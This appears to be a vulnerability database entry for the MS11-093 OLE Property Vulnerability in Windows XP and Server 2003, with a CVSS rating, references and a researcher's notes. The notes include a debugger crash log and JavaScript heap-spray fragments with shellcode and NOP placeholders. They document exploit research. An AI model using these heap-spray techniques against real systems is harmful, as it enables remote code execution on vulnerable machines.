9.3 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 do not properly handle OLE objects in memory, which allows remote attackers to execute arbitrary code via a crafted object in a file, aka “OLE Property Vulnerability.”
Recent assessments:
wchen-r7 at September 12, 2019 6:08pm UTC reported:
Embed a Visio Viewer In a Web Page: <http://msdn.microsoft.com/en-us/library/aa168474(v=office.11).aspx>
Crash Windows XP SP3 Visio Viewer 2010
(9b8.9bc): Unknown exception - code e0000002 (first chance)
(9b8.9bc): C++ EH exception - code e06d7363 (first chance)
(9b8.9bc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=001c12b8 ebx=00000000 ecx=00400035 edx=00000000 esi=001e6498 edi=029c4240
eip=0e000000 esp=00136cf4 ebp=00136d24 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
0e000000 ?? ???
0:000> !exchain
TRIAGER: Could not open triage file : C:\Program Files\Windows Kits\8.0\Debuggers\x86\triage\oca.ini, error 2
TRIAGER: Could not open triage file : C:\Program Files\Windows Kits\8.0\Debuggers\x86\winxp\triage.ini, error 2
TRIAGER: Could not open triage file : C:\Program Files\Windows Kits\8.0\Debuggers\x86\triage\user.ini, error 2
00136db4: *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\PROGRA~1\MICROS~2\Office14\VVIEWER.DLL -
VVIEWER!GetAllocCounters+132fc0 (602ae0fd)
00136de0: VVIEWER!GetAllocCounters+1332f5 (602ae432)
00136e2c: VVIEWER!GetAllocCounters+1311ba (602ac2f7)
00136ecc: VVIEWER!GetAllocCounters+1309e1 (602abb1e)
00136f40: VVIEWER!GetAllocCounters+130f7c (602ac0b9)
001381f4: VVIEWER!GetAllocCounters+11cf02 (6029803f)
00138228: VVIEWER!GetAllocCounters+11baee (60296c2b)
0013eae0: USER32!_except_handler3+0 (7e44048f)
CRT scope 0, func: USER32!UserCallWinProcCheckWow+155 (7e44ac6b)
0013eb40: USER32!_except_handler3+0 (7e44048f)
0013ee5c: BROWSEUI!_except_handler3+0 (76001b21)
CRT scope 0, filter: BROWSEUI!BrowserProtectedThreadProc+56 (75fa5394)
func: BROWSEUI!BrowserProtectedThreadProc+72 (75fa53b5)
0013ffe0: kernel32!_except_handler3+0 (7c839ac0)
CRT scope 0, filter: kernel32!BaseProcessStart+29 (7c843882)
func: kernel32!BaseProcessStart+3a (7c843898)
!heap addressses come on!!!!
js_pivot = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var nops = unescape("#{js_nops}");
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, #{my_target['Offset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
heap_obj.debugHeap(true);
for (var i=1; i < 0x1e0; i++) {
heap_obj.alloc(block);
}
heap_obj.debugHeap(false);
JS
heap spray to populate 200020
<script>
var heap_obj = new heapLib.ie(0x20000);
var nops = unescape("%u0c0c%u0c0c");
while (nops.length < 0x80000) nops += nops;
var shellcode = nops.substring(0, 0x800);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x1000-6)/2);
alert(1);
heap_obj.gc();
heap_obj.debugHeap(true);
for (var i=1; i < 0x1E; i++) {
heap_obj.alloc(block);
}
heap_obj.debugHeap(false);
alert(2);
</script>
Reliable UNICODE Pointers to the heap could be on the mapping of:
xpsp2res.dll re5.1.2600.5512
start end module name
01a30000 01cf5000 xpsp2res (deferred)
About Internet Explorer 6, before update
0:010> lmv m IEXPLORE
start end module name
00400000 00419000 IEXPLORE (deferred)
Image path: C:\Program Files\Internet Explorer\IEXPLORE.EXE
Image name: IEXPLORE.EXE
Timestamp: Sun Apr 13 20:34:13 2008 (48025225)
CheckSum: 00017A61
ImageSize: 00019000
File version: 6.0.2900.5512
Product version: 6.0.2900.5512
File flags: 0 (Mask 3F)
File OS: 40004 NT Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04b0
CompanyName: Microsoft Corporation
ProductName: Microsoft® Windows® Operating System
InternalName: iexplore
OriginalFilename: IEXPLORE.EXE
ProductVersion: 6.00.2900.5512
FileVersion: 6.00.2900.5512 (xpsp.080413-2105)
FileDescription: Internet Explorer
LegalCopyright: © Microsoft Corporation. All rights reserved.
After update
0:018> lmv m IEXPLORE
start end module name
00400000 00419000 IEXPLORE (deferred)
Image path: C:\Program Files\Internet Explorer\IEXPLORE.EXE
Image name: IEXPLORE.EXE
Timestamp: Sun Apr 13 20:34:13 2008 (48025225)
CheckSum: 00017A61
ImageSize: 00019000
File version: 6.0.2900.5512
Product version: 6.0.2900.5512
File flags: 0 (Mask 3F)
File OS: 40004 NT Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04b0
CompanyName: Microsoft Corporation
ProductName: Microsoft® Windows® Operating System
InternalName: iexplore
OriginalFilename: IEXPLORE.EXE
ProductVersion: 6.00.2900.5512
FileVersion: 6.00.2900.5512 (xpsp.080413-2105)
FileDescription: Internet Explorer
LegalCopyright: © Microsoft Corporation. All rights reserved.
After updates:
Internet Explorer 7
0:014> lmv m IEFRAME
start end module name
009c0000 00f89000 IEFRAME (deferred)
Image path: C:\WINDOWS\system32\IEFRAME.dll
Image name: IEFRAME.dll
Timestamp: Tue Aug 14 03:54:09 2007 (46C10B41)
CheckSum: 005CA70C
ImageSize: 005C9000
File version: 7.0.5730.13
Product version: 7.0.5730.13
File flags: 8 (Mask 3F) Private
File OS: 40004 NT Win32
File type: 2.0 Dll
File date: 00000000.00000000
Translations: 0409.04b0
CompanyName: Microsoft Corporation
ProductName: Windows® Internet Explorer
InternalName: IEFRAME.DLL
OriginalFilename: IEFRAME.DLL
ProductVersion: 7.00.5730.13
FileVersion: 7.00.5730.13 (longhorn(wmbla).070711-1130)
FileDescription: Internet Explorer
LegalCopyright: © Microsoft Corporation. All rights reserved.
Assessed Attacker Value: 0
Assessed Attacker Value: 0Assessed Attacker Value: 0
aluigi.org/adv/ole32_1-adv.txt
poi.apache.org/hpsf/thumbnails.html
www.us-cert.gov/cas/techalerts/TA11-347A.html
www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=966
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3400
docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-093
oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14668